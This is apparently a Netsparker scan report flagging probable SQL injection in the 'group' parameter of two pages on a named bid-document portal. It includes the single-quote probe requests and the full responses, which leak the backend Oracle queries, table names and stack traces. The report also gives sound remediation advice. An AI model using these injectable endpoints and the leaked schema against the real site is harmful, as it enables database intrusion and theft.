org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </td> </tr> </table></body></html>
[High Possibility] SQL Injection
[High Possibility] SQL Injection
17
TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, Updating and Deleting arbitrary data from the database
- Executing commands on the underlying operating system
- Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
- See the remedy for solution.
- If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
- Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
- Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.
Remedy
A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html |
Parameters
| Parameter | Type | Value |
| group | GET | %27 |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:50 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:50 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9837
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:01:51.014 [ 1] (TP-Processor1808) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = %27 GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:01:50 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:50 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9837
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:01:51.014 [ 1] (TP-Processor1808) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = %27 GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html |
Parameters
| Parameter | Type | Value |
| group | GET | %27 |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:51 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:51 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9652
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:01:52.724 [ 1] (TP-Processor1812) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = %27 GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" 